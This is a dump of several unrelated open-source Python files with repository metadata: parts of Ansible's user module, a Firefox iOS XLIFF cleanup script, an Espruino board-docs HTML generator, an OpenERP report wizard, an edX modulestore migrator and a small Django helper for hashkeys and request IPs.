remove=dict(type='bool', default=False),
# following options are specific to useradd
create_home=dict(type='bool', default=True, aliases=['createhome']),
skeleton=dict(type='str'),
system=dict(type='bool', default=False),
# following options are specific to usermod
move_home=dict(type='bool', default=False),
append=dict(type='bool', default=False),
# following are specific to ssh key generation
generate_ssh_key=dict(type='bool'),
ssh_key_bits=dict(type='int', default=ssh_defaults['bits']),
ssh_key_type=dict(type='str', default=ssh_defaults['type']),
ssh_key_file=dict(type='path'),
ssh_key_comment=dict(type='str', default=ssh_defaults['comment']),
ssh_key_passphrase=dict(type='str', no_log=True),
update_password=dict(type='str', default='always', choices=['always', 'on_create']),
expires=dict(type='float'),
password_lock=dict(type='bool'),
local=dict(type='bool'),
profile=dict(type='str'),
authorization=dict(type='str'),
role=dict(type='str'),
),
supports_check_mode=True
)
user = User(module)
user.check_password_encrypted()
module.debug('User instantiated - platform %s' % user.platform)
if user.distribution:
module.debug('User instantiated - distribution %s' % user.distribution)
rc = None
out = ''
err = ''
result = {}
result['name'] = user.name
result['state'] = user.state
if user.state == 'absent':
if user.user_exists():
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = user.remove_user()
if rc != 0:
module.fail_json(name=user.name, msg=err, rc=rc)
result['force'] = user.force
result['remove'] = user.remove
elif user.state == 'present':
if not user.user_exists():
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = user.create_user()
            result['system'] = user.system
result['create_home'] = user.create_home
else:
# modify user (note: this function is check mode aware)
(rc, out, err) = user.modify_user()
result['append'] = user.append
result['move_home'] = user.move_home
if rc is not None and rc != 0:
module.fail_json(name=user.name, msg=err, rc=rc)
if user.password is not None:
result['password'] = 'NOT_LOGGING_PASSWORD'
if rc is None:
result['changed'] = False
else:
result['changed'] = True
if out:
result['stdout'] = out
if err:
result['stderr'] = err
if user.user_exists() and user.state == 'present':
info = user.user_info()
if info is False:
result['msg'] = "failed to look up user name: %s" % user.name
result['failed'] = True
result['uid'] = info[2]
result['group'] = info[3]
result['comment'] = info[4]
result['home'] = info[5]
result['shell'] = info[6]
if user.groups is not None:
result['groups'] = user.groups
# handle missing homedirs
info = user.user_info()
if user.home is None:
user.home = info[5]
if not os.path.exists(user.home) and user.create_home:
if not module.check_mode:
user.create_homedir(user.home)
user.chown_homedir(info[2], info[3], user.home)
result['changed'] = True
# deal with ssh key
if user.sshkeygen:
# generate ssh key (note: this function is check mode aware)
(rc, out, err) = user.ssh_key_gen()
if rc is not None and rc != 0:
module.fail_json(name=user.name, msg=err, rc=rc)
if rc == 0:
result['changed'] = True
(rc, out, err) = user.ssh_key_fingerprint()
if rc == 0:
result['ssh_fingerprint'] = out.strip()
else:
result['ssh_fingerprint'] = err.strip()
result['ssh_key_file'] = user.get_ssh_key_path()
result['ssh_public_key'] = user.get_ssh_public_key()
module.exit_json(**result)
# import module snippets
if __name__ == '__main__':
main()
| EvanK/ansible | lib/ansible/modules/system/user.py | Python | gpl-3.0 | 97,224 |
#!/usr/bin/env python
#
# xliff-cleanup.py <files>
#
# 1. Remove all <file> sections that we do not care about. We only care about
# the one for our main app and those for our extensions.
#
# 2. Look at all remaining <file> sections and remove those strings that should not
# be localized. Currently that means: CFBundleDisplayName, CFBundleName and
# CFBundleShortVersionString.
#
# 3. Remove all remaining <file> sections that now have no <trans-unit> nodes
# in their <body> anymore.
#
# Modifies files in place. Makes no backup.
#
import sys
from lxml import etree
NS = {'x':'urn:oasis:names:tc:xliff:document:1.2'}
FILES_TO_KEEP = ('Client/Info.plist',
'Extensions/ShareTo/Info.plist',
'Extensions/SendTo/Info.plist',
'Extensions/Today/Info.plist',
'Extensions/ViewLater/Info.plist')
STRINGS_TO_REMOVE = ('CFBundleDisplayName',
'CFBundleName',
'CFBundleShortVersionString')
if __name__ == "__main__":
for path in sys.argv[1:]:
# Read it in and modify it in memory
with open(path) as fp:
tree = etree.parse(fp)
root = tree.getroot()
# 1. Remove sections we do not care about
for file_node in root.xpath("//x:file", namespaces=NS):
original = file_node.get('original')
if original and original.endswith('Info.plist'):
if file_node.get('original') not in FILES_TO_KEEP:
file_node.getparent().remove(file_node)
# 2. Remove strings we don't want to be translated
for file_node in root.xpath("//x:file", namespaces=NS):
original = file_node.get('original')
if original and original.endswith('Info.plist'):
for trans_unit_node in file_node.xpath("./x:body/x:trans-unit", namespaces=NS):
id = trans_unit_node.get('id')
# TODO we should probably do the exception for SendTo in a nicer way with some kind of whitelist
if id and id in STRINGS_TO_REMOVE and not ((original == "Extensions/SendTo/Info.plist" and id == "CFBundleDisplayName") or (original == "Extensions/ViewLater/Info.plist" and id == "CFBundleDisplayName")):
trans_unit_node.getparent().remove(trans_unit_node)
# 3. Remove empty file sections
for file_node in root.xpath("//x:file", namespaces=NS):
original = file_node.get('original')
if original and original.endswith('Info.plist'):
trans_unit_nodes = file_node.xpath("x:body/x:trans-unit", namespaces=NS)
if len(trans_unit_nodes) == 0:
file_node.getparent().remove(file_node)
# Write it back to the same file
with open(path, "w") as fp:
fp.write(etree.tostring(tree))
| doronkatz/firefox-ios | scripts/xliff-cleanup.py | Python | mpl-2.0 | 2,992 |
#!/usr/bin/python
# This file is part of Espruino, a JavaScript interpreter for Microcontrollers
#
# Copyright (C) 2013 Gordon Williams <[email protected]>
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
#
# ----------------------------------------------------------------------------------------
# Builds HTML documentation from the files in the boards directory
# ----------------------------------------------------------------------------------------
import subprocess;
import re;
import json;
import sys;
import os;
import importlib;
scriptdir = os.path.dirname(os.path.realpath(__file__))
basedir = scriptdir+"/../"
sys.path.append(basedir+"scripts");
sys.path.append(basedir+"boards");
import pinutils;
# -----------------------------------------------------------------------------------------
# Now scan AF file
print "Script location "+scriptdir
embeddable = False
boardname = ""
if len(sys.argv)==3 and sys.argv[2]=="pinout":
embeddable = True
boardname = sys.argv[1]
if len(sys.argv)==2:
boardname = sys.argv[1]
if boardname=="":
print "ERROR..."
print "USAGE: build_board_docs.py BOARD_NAME [pinout]"
print " 'pinout' will output embeddable HTML of just the pinout"
exit(1)
print "BOARD "+boardname
#htmlFilename = sys.argv[2]
htmlFilename = "boards/"+boardname+".html"
print "HTML_FILENAME "+htmlFilename
htmlFile = open(htmlFilename, 'w')
def writeHTML(s): htmlFile.write(s+"\n");
# import the board def
board = importlib.import_module(boardname)
# Call the included board_specific file - it sets up 'pins' and 'fill_gaps'
pins = board.get_pins()
pins = pinutils.append_devices_to_pin_list(pins, board)
#if not embeddable and "link" in board.info and board.info["link"][0].startswith("http://www.espruino.com"):
# writeHTML('<html><head><meta http-equiv="refresh" content="0; url="'+board.info["link"][0]+'"></head><body>Please wait. redirecting...</body></html>');
# exit(0);
# -----------------------------------------------------------------------------------------
functionsOnBoard = [];
for pin in pins:
if pin["name"][0] == 'P':
pin["name"] = pin["name"][1:];
for func in pin["functions"]:
if func in pinutils.CLASSES:
if not pinutils.CLASSES[func] in functionsOnBoard:
functionsOnBoard.append(pinutils.CLASSES[func])
pinmap = {};
if '_pinmap' in board.board:
pinmap = board.board['_pinmap'];
# -----------------------------------------------------------------------------------------
def dump_pin(pin, pinstrip):
if pin in pinmap:
pin = pinmap[pin];
pininfo = pinutils.findpin(pins, pin, False)
not_five_volt = False
# print(json.dumps(pininfo))
if ("csv" in pininfo) and ("IO" in pininfo["csv"]) and ("Type" in pininfo["csv"]) and (pininfo["csv"]["Type"]=="I/O") and (pininfo["csv"]["IO"]!="FT") :
not_five_volt = True
writeHTML(' <DIV class="'+pinstrip+'pin pin">');
pinHTML = ' <SPAN class="pinname">'+pin+"</SPAN>";
pinHTML2 = '';
if not_five_volt:
pinHTML2 += '<SPAN class="pinfunction NOT_5V" title="Not 5v Tolerant">3.3v</SPAN>\n';
if ("_notes" in board.board) and (pin in board.board["_notes"]):
pinHTML2 += '<SPAN class="pinfunction NOTE" title="'+board.board["_notes"][pin]+'">!</SPAN>\n';
reverse = pinstrip=="left" or pinstrip=="right2";
if not reverse: writeHTML(pinHTML+"\n"+pinHTML2)
pinfuncs = {}
for func in sorted(pininfo["functions"]):
# writeHTML(' '+func)
if func in pinutils.CLASSES:
funcdata = str(pininfo["functions"][func])
cls = pinutils.CLASSES[func]
name = cls
title = func
if cls=="I2C" or cls=="SPI" or cls=="USART": name=func.replace("_"," ")
if cls=="DEVICE" and funcdata[:4]=="pin_":
title = title + " ("+funcdata[4:]+")";
# print title
if func in pinutils.NAMES: name = pinutils.NAMES[func]
writeHTML('<!-- '+func+' -->')
if name in pinfuncs:
pinfuncs[name]["title"] = pinfuncs[name]["title"] + " " + title
else:
pinfuncs[name] = { 'cls': cls, 'title': "["+pin+"] "+title, 'name': name, 'id': pin+"_"+func, 'func' : func };
for func in sorted(pinfuncs.items(),key=lambda x: x[1]['cls']):
pf = func[1]
url = False
if pf["cls"] in pinutils.URLS: url = pinutils.URLS[pf["cls"]]
if pf["func"] in pinutils.URLS: url = pinutils.URLS[pf["func"]]
if url != False: writeHTML(' <A href="'+url+'" class="pinfunctionlink">');
writeHTML(' <SPAN class="pinfunction '+pf["cls"]+'" title="'+pf["title"]+'" onMouseOver="showTT(\''+pf["id"]+'\')" onMouseOut="hideTT(\''+pf["id"]+'\')">'+pf["name"]+'</SPAN>')
if url != False: writeHTML(' </A>');
writeHTML(' <SPAN class="pintooltip" id="'+pf["id"]+'" style="display:none;">'+pf["title"]+'</SPAN>')
if reverse: writeHTML(pinHTML2+"\n"+pinHTML)
writeHTML(' </DIV>')
if not embeddable:
writeHTML("""<HTML>
<HEAD>
""");
writeHTML(""" <STYLE>
#boardcontainer { position: relative; }
#board {
position: absolute;
   background-size: 100% auto; /* width and height, can be %, px or whatever. */
}
.pin { padding: 1px; height: 20px; }
.pinname {
background-color: #FFF;
border:1px solid black;
padding-left: 2px;
padding-right: 2px;
font-weight: bold;
}
.pinfunction {
border:1px solid black;
border-radius:3px;
padding-left: 2px;
padding-right: 2px;
}
.pinfunctionlink {
color : black;
text-decoration: none;
}
.pintooltip {
background-color: #FFD;
border:1px solid black;
padding-left: 2px;
padding-right: 2px;
font-weight: bold;
position: absolute;
z-index: 100;
}
.SPI { background-color: #8F8; }
.ADC { background-color: #88F; }
.DAC { background-color: #0CC; }
.PWM { background-color: #8FF; }
.USART { background-color: #FF8; }
.CAN { background-color: #8CC; }
.I2C { background-color: #F88; }
.DEVICE { background-color: #F8F; }
.NOT_5V { background-color: #FDD; }
.NOTE { background-color: #F80; }
#top { white-space: nowrap; }
#top2 { white-space: nowrap; }
#bottom { white-space: nowrap; }
#bottom2 { white-space: nowrap; }
#left { text-align:right; }
#right2 { text-align:right; }
.toppin {
-webkit-transform: rotate(-90deg);
-moz-transform: rotate(-90deg);
-ms-transform: rotate(-90deg);
-o-transform: rotate(-90deg);
transform: rotate(-90deg);
display: inline-block;
width: 20px;
}
.top2pin {
-webkit-transform: rotate(90deg);
-moz-transform: rotate(90deg);
-ms-transform: rotate(90deg);
-o-transform: rotate(90deg);
transform: rotate(90deg);
display: inline-block;
width: 20px;
}
.bottompin {
-webkit-transform: rotate(90deg);
-moz-transform: rotate(90deg);
-ms-transform: rotate(90deg);
-o-transform: rotate(90deg);
transform: rotate(90deg);
display: inline-block;
width: 20px;
}
.bottom2pin {
-webkit-transform: rotate(-90deg);
-moz-transform: rotate(-90deg);
-ms-transform: rotate(-90deg);
-o-transform: rotate(-90deg);
transform: rotate(-90deg);
display: inline-block;
width: 20px;
}
.line {
height:2px;background-color:red;position:absolute;
}
.line:hover {
background-color:#FF00FF;
}
""");
for pinstrip in board.board:
if pinstrip[0]!='_':
writeHTML(" #"+pinstrip+" { position: absolute; }")
writeHTML(" ."+pinstrip+"pin { white-space: nowrap; }")
writeHTML(board.board_css)
writeHTML(" </STYLE>"+'<script src="http://code.jquery.com/jquery-1.11.0.min.js"></script>')
writeHTML("""
<SCRIPT type="text/javascript">
function showTT(ttid) {
var e = document.getElementById(ttid);
e.style.display = 'block';
}
function hideTT(ttid) {
var e = document.getElementById(ttid);
e.style.display = 'none';
}
function drawLine(x1, y1, x2, y2, hover) {
if (x2 < x1) {
var temp = x1;
x1 = x2;
x2 = temp;
temp = y1;
y1 = y2;
y2 = temp;
}
var line = $('<div class="line" alt="'+hover+'"></div>').appendTo($("body"));
var length = Math.sqrt((x1 - x2) * (x1 - x2) + (y1 - y2) * (y1 - y2));
line.css('width', length + "px");
var angle = Math.atan((y2 - y1) / (x2 - x1));
line.css('top', y1 + 0.5 * length * Math.sin(angle) + "px");
line.css('left', x1 - 0.5 * length * (1 - Math.cos(angle)) + "px");
line.css('-moz-transform', "rotate(" + angle + "rad)");
line.css('-webkit-transform', "rotate(" + angle + "rad)");
line.css('-o-transform', "rotate(" + angle + "rad)");
}
</SCRIPT>
""")
if not embeddable:
writeHTML(" </HEAD>")
writeHTML(" <BODY>")
writeHTML(' <H1>'+board.info["name"]+'</H1>')
writeHTML(' <!-- '+boardname+' -->')
if "link" in board.info:
for link in board.info["link"]:
writeHTML(' <P><a href=\"'+link+'\"" target="_blank">'+link+'</a></P>')
writeHTML(' <H2>Specifications</H2>')
writeHTML(' <TABLE style="margin-left:100px;">')
writeHTML(' <TR><TH width="256">Chip</TH><TD>'+board.chip['part']+'</TD></TR>')
writeHTML(' <TR><TH>Package</TH><TD>'+board.chip['package']+'</TD></TR>')
writeHTML(' <TR><TH>RAM</TH><TD>'+str(board.chip['ram'])+' kBytes</TD></TR>')
writeHTML(' <TR><TH>Flash</TH><TD>'+str(board.chip['flash'])+' kBytes</TD></TR>')
writeHTML(' <TR><TH>Speed</TH><TD>'+str(board.chip['speed'])+' Mhz</TD></TR>')
writeHTML(' <TR><TH>USARTs</TH><TD>'+str(board.chip['usart'])+'</TD></TR>')
writeHTML(' <TR><TH>SPIs</TH><TD>'+str(board.chip['spi'])+'</TD></TR>')
writeHTML(' <TR><TH>I2Cs</TH><TD>'+str(board.chip['i2c'])+'</TD></TR>')
writeHTML(' <TR><TH>USB</TH><TD>'+("Yes" if "USB" in board.devices else "No")+'</TD></TR>')
writeHTML(' <TR><TH>DACs</TH><TD>'+(str(board.chip['dac']) if board.chip['dac']>0 else "No")+'</TD></TR>')
writeHTML(' <TR><TH>SD Card</TH><TD>'+("Yes" if "SD" in board.devices else "No")+'</TD></TR>')
writeHTML(' </TABLE>')
writeHTML(' <P>Like this? Please tell your friends, blog, or <a href="http://www.espruino.com/Order">support us by buying our board</a>!</P>')
writeHTML(' <H2>Pinout</H2>')
writeHTML("""
    <P>Hover the mouse over a pin function for more information. Clicking on a function will tell you how to use it in Espruino.</P>
<ul>
<li><span class="pinfunction DEVICE">Purple</span> boxes show pins that are used for other functionality on the board. You should avoid using these unless you know that the marked device is not used.</li>
<li><span class="pinfunction NOTE">!</span> boxes contain extra information about the pin. Hover your mouse over them to see it.</li>
<li><span class="pinfunction NOT_5V">3.3v</span> boxes mark pins that are not 5v tolerant (they only take inputs from 0 - 3.3v, not 0 - 5v).</li>
<li><span class="pinfunction">3.3</span> is a 3.3v output from the on-board Voltage regulator.</li>
<li><span class="pinfunction">GND</span> is ground (0v).</li>
<li><span class="pinfunction">VBAT</span> is the battery voltage output (see <a href="/EspruinoBoard">the Espruino Board Reference</a>).</li>
<li><span class="pinfunction ADC">ADC</span> is an <a href="/ADC">Analog to Digital Converter</a> (for reading analog voltages)</li>""");
if "DAC" in functionsOnBoard: writeHTML(""" <li><span class="pinfunction DAC">DAC</span> is a <a href="/DAC">Digital to Analog Converter</a> (for creating analog voltages). This is not available on all boards.</li>""")
writeHTML(""" <li><span class="pinfunction PWM">PWM</span> is for <a href="/PWM">Pulse Width Modulation</a>. This creates analog voltages from a digital output by sending a series of pulses.</li>
<li><span class="pinfunction SPI">SPI</span> is the 3 wire <a href="/SPI">Serial Peripheral Interface</a>.</li>
<li><span class="pinfunction USART">USART</span> is a 2 wire peripheral for <a href="/USART">Serial Data</a>.</li>
<li><span class="pinfunction I2C">I2C</span> is the 2 wire <a href="/I2C">Inter-Integrated Circuit</a> bus.</li>
""");
if "CAN" in functionsOnBoard: writeHTML(""" <li><span class="pinfunction CAN">CAN</span> is for the <a href="http://en.wikipedia.org/wiki/CAN_bus">Controller Area Network</a>. It is not supported by Espruino.</li>""")
writeHTML(" </ul>");
writeHTML(' <DIV id="boardcontainer">')
writeHTML(' <DIV id="board">')
usedpins = []
for pinstrip in board.board:
if pinstrip[0]!='_':
writeHTML(' <DIV id="'+pinstrip+'">')
for pin in board.board[pinstrip]:
usedpins.append(pin)
dump_pin(pin, pinstrip)
writeHTML(' </DIV>')
otherpins=0
for pinstruct in pins:
pin = pinstruct["name"]
if not pin in usedpins:
otherpins = otherpins + 1
writeHTML(' </DIV id="board">')
writeHTML(' </DIV id="boardcontainer">')
if otherpins>0:
writeHTML(' <DIV id="otherpins">')
writeHTML(' <H2>Pins not on connectors</H2>')
for pinstruct in pins:
pin = pinstruct["name"]
if not pin in usedpins:
dump_pin(pin, "otherpins")
writeHTML(' </DIV>')
writeHTML(' <P></P>')
#writeHTML('<SCRIPT type="text/javascript"> $(function() {');
#writeHTML('var x = $("#board").offset().left+500;');
#writeHTML('var y = $("#board").offset().top+200;');
#d = 12
#writeHTML('drawLine(x+'+str(-5*d)+',y+'+str(-5*d)+',x+'+str(5*d)+',y+'+str(-5*d)+');');
#writeHTML('drawLine(x+'+str(5*d)+',y+'+str(-5*d)+',x+'+str(5*d)+',y+'+str(5*d)+');');
#writeHTML('drawLine(x+'+str(5*d)+',y+'+str(5*d)+',x+'+str(-5*d)+',y+'+str(5*d)+');');
#writeHTML('drawLine(x+'+str(-5*d)+',y+'+str(5*d)+',x+'+str(-5*d)+',y+'+str(-5*d)+');');
#writeHTML('var p;');
#for pinstrip in board.board:
# if pinstrip[0]!='_':
# for pin in board.board[pinstrip]:
# if pin in pinmap:
# pin = pinmap[pin];
# pininfo = pinutils.findpin(pins, pin, False)
# if "UQFN48" in pininfo["csv"]:
# n = int(pininfo["csv"]["UQFN48"])-1
# n = (n+12) % 48
# if n<12:
# px = (n-6)*d
# py = -6*d
# elif n<24:
# px = 6*d
# py = ((n-12)-6)*d
# elif n<36:
# px = (6-(n-24))*d
# py = 6*d
# else:
# px = -6*d
# py = (6-(n-36))*d
#
# writeHTML("p=$('.pinname:contains(\""+pin+".\")');");
# pinx = "p.offset().left+p.width()/2";
# piny = "p.offset().top+p.height()/2";
# writeHTML('drawLine(x+'+str(px)+',y+'+str(py)+','+pinx+','+piny+', "'+pin+'");');
#writeHTML('});</SCRIPT>');
if not embeddable:
writeHTML(" </BODY>")
writeHTML("</HTML>")
| koltegirish/Espruino | scripts/build_board_docs.py | Python | mpl-2.0 | 14,959 |
##############################################################################
#
# Copyright (c) 2008-2011 Alistek Ltd (http://www.alistek.com) All Rights Reserved.
# General contacts <[email protected]>
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsability of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# garantees and support are strongly adviced to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 3
# of the License, or (at your option) any later version.
#
# This module is GPLv3 or newer and incompatible
# with OpenERP SA "AGPL + Private Use License"!
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
##############################################################################
import wizard
import pooler
from tools.translate import _
def ir_del(cr, uid, id):
obj = pooler.get_pool(cr.dbname).get('ir.values')
return obj.unlink(cr, uid, [id])
class report_actions_remove_wizard(wizard.interface):
'''
Remove print button
'''
form = '''<?xml version="1.0"?>
<form string="Remove print button">
<label string="Or you want to remove print button for this report?"/>
</form>'''
ex_form = '''<?xml version="1.0"?>
<form string="Remove print button">
<label string="No Report Action to delete for this report"/>
</form>'''
done_form = '''<?xml version="1.0"?>
<form string="Remove print button">
<label string="The print button is successfully removed"/>
</form>'''
def _do_action(self, cr, uid, data, context):
pool = pooler.get_pool(cr.dbname)
report = pool.get(data['model']).read(cr, uid, data['id'], ['report_wizard'], context=context)
if report['report_wizard']:
pool.get('ir.actions.act_window').unlink(cr, uid, data['report_action_id'], context=context)
else:
event_id = pool.get('ir.values').search(cr, uid, [('value','=','ir.actions.report.xml,%d' % data['id'])])[0]
res = ir_del(cr, uid, event_id)
return {}
def _check(self, cr, uid, data, context):
pool = pooler.get_pool(cr.dbname)
report = pool.get(data['model']).browse(cr, uid, data['id'], context=context)
if report.report_wizard:
act_win_obj = pool.get('ir.actions.act_window')
act_win_ids = act_win_obj.search(cr, uid, [('res_model','=','aeroo.print_actions')], context=context)
for act_win in act_win_obj.browse(cr, uid, act_win_ids, context=context):
act_win_context = eval(act_win.context, {})
if act_win_context.get('report_action_id')==report.id:
data['report_action_id'] = act_win.id
return 'remove'
return 'no_exist'
else:
ids = pool.get('ir.values').search(cr, uid, [('value','=',report.type+','+str(data['id']))])
if not ids:
return 'no_exist'
else:
return 'remove'
states = {
'init': {
'actions': [],
'result': {'type':'choice','next_state':_check}
},
'remove': {
'actions': [],
'result': {'type': 'form', 'arch': form, 'fields': {}, 'state': (('end', _('_No')), ('process', _('_Yes')))},
},
'no_exist': {
'actions': [],
'result': {'type': 'form', 'arch': ex_form, 'fields': {}, 'state': (('end', _('_Close')),)},
},
'process': {
'actions': [_do_action],
'result': {'type': 'state', 'state': 'done'},
},
'done': {
'actions': [],
'result': {'type': 'form', 'arch': done_form, 'fields': {}, 'state': (('exit', _('_Close')),)},
},
'exit': {
'actions': [],
'result': {'type': 'state', 'state': 'end'},
},
}
report_actions_remove_wizard('aeroo.report_actions_remove')
| kailIII/emaresa | trunk.pe/report_aeroo/wizard/report_actions_remove.py | Python | agpl-3.0 | 4,658 |
'''
Code for migrating from other modulestores to the split_mongo modulestore.
Exists at the top level of modulestore b/c it needs to know about and access each modulestore.
In general, it's strategy is to treat the other modulestores as read-only and to never directly
manipulate storage but use existing api's.
'''
import logging
from opaque_keys.edx.locator import CourseLocator
from xblock.fields import Reference, ReferenceList, ReferenceValueDict
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.exceptions import ItemNotFoundError
log = logging.getLogger(__name__)
class SplitMigrator:
"""
Copies courses from old mongo to split mongo and sets up location mapping so any references to the old
name will be able to find the new elements.
"""
def __init__(self, split_modulestore, source_modulestore):
super().__init__()
self.split_modulestore = split_modulestore
self.source_modulestore = source_modulestore
def migrate_mongo_course(
self, source_course_key, user_id, new_org=None, new_course=None, new_run=None, fields=None, **kwargs
):
"""
        Create a new course in split_mongo representing the published and draft versions of the course from the
        original mongo store, and return the new CourseLocator.
If the new course already exists, this raises DuplicateItemError
:param source_course_key: which course to migrate
:param user_id: the user whose action is causing this migration
:param new_org, new_course, new_run: (optional) identifiers for the new course. Defaults to
the source_course_key's values.
"""
# the only difference in data between the old and split_mongo xblocks are the locations;
# so, any field which holds a location must change to a Locator; otherwise, the persistence
# layer and kvs's know how to store it.
# locations are in location, children, conditionals, course.tab
# create the course: set fields to explicitly_set for each scope, id_root = new_course_locator, master_branch = 'production' # lint-amnesty, pylint: disable=line-too-long
original_course = self.source_modulestore.get_course(source_course_key, **kwargs)
if original_course is None:
raise ItemNotFoundError(str(source_course_key))
if new_org is None:
new_org = source_course_key.org
if new_course is None:
new_course = source_course_key.course
if new_run is None:
new_run = source_course_key.run
new_course_key = CourseLocator(new_org, new_course, new_run, branch=ModuleStoreEnum.BranchName.published)
with self.split_modulestore.bulk_operations(new_course_key):
new_fields = self._get_fields_translate_references(original_course, new_course_key, None)
if fields:
new_fields.update(fields)
new_course = self.split_modulestore.create_course(
new_org, new_course, new_run, user_id,
fields=new_fields,
master_branch=ModuleStoreEnum.BranchName.published,
skip_auto_publish=True,
**kwargs
)
self._copy_published_modules_to_course(
new_course, original_course.location, source_course_key, user_id, **kwargs
)
# TODO: This should be merged back into the above transaction, but can't be until split.py
# is refactored to have more coherent access patterns
with self.split_modulestore.bulk_operations(new_course_key):
# create a new version for the drafts
self._add_draft_modules_to_course(new_course.location, source_course_key, user_id, **kwargs)
return new_course.id
def _copy_published_modules_to_course(self, new_course, old_course_loc, source_course_key, user_id, **kwargs):
"""
Copy all of the modules from the 'direct' version of the course to the new split course.
"""
course_version_locator = new_course.id.version_agnostic()
# iterate over published course elements. Wildcarding rather than descending b/c some elements are orphaned (e.g., # lint-amnesty, pylint: disable=line-too-long
# course about pages, conditionals)
for module in self.source_modulestore.get_items(
source_course_key, revision=ModuleStoreEnum.RevisionOption.published_only, **kwargs
):
# don't copy the course again.
if module.location != old_course_loc:
# create split_xblock using split.create_item
# NOTE: the below auto populates the children when it migrates the parent; so,
# it doesn't need the parent as the first arg. That is, it translates and populates
# the 'children' field as it goes.
_new_module = self.split_modulestore.create_item(
user_id,
course_version_locator,
module.location.block_type,
block_id=module.location.block_id,
fields=self._get_fields_translate_references(
module, course_version_locator, new_course.location.block_id
),
skip_auto_publish=True,
**kwargs
)
# after done w/ published items, add version for DRAFT pointing to the published structure
index_info = self.split_modulestore.get_course_index_info(course_version_locator)
versions = index_info['versions']
versions[ModuleStoreEnum.BranchName.draft] = versions[ModuleStoreEnum.BranchName.published]
self.split_modulestore.update_course_index(course_version_locator, index_info)
# clean up orphans in published version: in old mongo, parents pointed to the union of their published and draft
# children which meant some pointers were to non-existent locations in 'direct'
self.split_modulestore.fix_not_found(course_version_locator, user_id)
def _add_draft_modules_to_course(self, published_course_usage_key, source_course_key, user_id, **kwargs):
"""
update each draft. Create any which don't exist in published and attach to their parents.
"""
# each true update below will trigger a new version of the structure. We may want to just have one new version
# but that's for a later date.
new_draft_course_loc = published_course_usage_key.course_key.for_branch(ModuleStoreEnum.BranchName.draft)
        # to prevent race conditions of grandchildren being added before their parents and thus having no parent to
# add to
awaiting_adoption = {}
for module in self.source_modulestore.get_items(
source_course_key, revision=ModuleStoreEnum.RevisionOption.draft_only, **kwargs
):
new_locator = new_draft_course_loc.make_usage_key(module.category, module.location.block_id)
if self.split_modulestore.has_item(new_locator):
# was in 'direct' so draft is a new version
split_module = self.split_modulestore.get_item(new_locator, **kwargs)
# need to remove any no-longer-explicitly-set values and add/update any now set values.
for name, field in split_module.fields.items():
if field.is_set_on(split_module) and not module.fields[name].is_set_on(module):
field.delete_from(split_module)
for field, value in self._get_fields_translate_references(
module, new_draft_course_loc, published_course_usage_key.block_id, field_names=False
).items():
field.write_to(split_module, value)
_new_module = self.split_modulestore.update_item(split_module, user_id, **kwargs)
else:
# only a draft version (aka, 'private').
_new_module = self.split_modulestore.create_item(
user_id, new_draft_course_loc,
new_locator.block_type,
block_id=new_locator.block_id,
fields=self._get_fields_translate_references(
module, new_draft_course_loc, published_course_usage_key.block_id
),
**kwargs
)
awaiting_adoption[module.location] = new_locator
for draft_location, new_locator in awaiting_adoption.items():
parent_loc = self.source_modulestore.get_parent_location(
draft_location, revision=ModuleStoreEnum.RevisionOption.draft_preferred, **kwargs
)
if parent_loc is None:
log.warning('No parent found in source course for %s', draft_location)
continue
old_parent = self.source_modulestore.get_item(parent_loc, **kwargs)
split_parent_loc = new_draft_course_loc.make_usage_key(
parent_loc.block_type,
parent_loc.block_id if parent_loc.block_type != 'course' else published_course_usage_key.block_id
)
new_parent = self.split_modulestore.get_item(split_parent_loc, **kwargs)
# this only occurs if the parent was also awaiting adoption: skip this one, go to next
if any(new_locator.block_id == child.block_id for child in new_parent.children):
continue
# find index for module: new_parent may be missing quite a few of old_parent's children
new_parent_cursor = 0
for old_child_loc in old_parent.children:
if old_child_loc.block_id == draft_location.block_id:
break # moved cursor enough, insert it here
# sibling may move cursor
for idx in range(new_parent_cursor, len(new_parent.children)):
if new_parent.children[idx].block_id == old_child_loc.block_id:
new_parent_cursor = idx + 1
break # skipped sibs enough, pick back up scan
new_parent.children.insert(new_parent_cursor, new_locator)
new_parent = self.split_modulestore.update_item(new_parent, user_id)
def _get_fields_translate_references(self, xblock, new_course_key, course_block_id, field_names=True):
"""
Return a dictionary of field: value pairs for explicitly set fields
but convert all references to their BlockUsageLocators
Args:
field_names: if Truthy, the dictionary keys are the field names. If falsey, the keys are the
field objects.
"""
def get_translation(location):
"""
Convert the location
"""
return new_course_key.make_usage_key(
location.block_type,
location.block_id if location.block_type != 'course' else course_block_id
)
result = {}
for field_name, field in xblock.fields.items():
if field.is_set_on(xblock):
field_value = field.read_from(xblock)
field_key = field_name if field_names else field
if isinstance(field, Reference) and field_value is not None:
result[field_key] = get_translation(field_value)
elif isinstance(field, ReferenceList):
result[field_key] = [
get_translation(ele) for ele in field_value
]
elif isinstance(field, ReferenceValueDict):
result[field_key] = {
key: get_translation(subvalue)
for key, subvalue in field_value.items()
}
else:
result[field_key] = field_value
return result
| eduNEXT/edx-platform | common/lib/xmodule/xmodule/modulestore/split_migrator.py | Python | agpl-3.0 | 11,976 |
import hashlib
def make_hashkey(seed):
'''
Generate a hashkey (string)
'''
h = hashlib.md5()
h.update(str(seed))
return h.hexdigest()
def get_request_ip(request):
'''
Retrieve the IP origin of a Django request
'''
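    # HTTP_X_REAL_IP is only present when a reverse proxy such as nginx sets it,
    # e.g. with "proxy_set_header X-Real-IP $remote_addr;"; otherwise the client
    # address is whatever WSGI put in REMOTE_ADDR.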
ip = request.META.get('HTTP_X_REAL_IP','') # nginx reverse proxy
if not ip:
ip = request.META.get('REMOTE_ADDR','None')
return ip
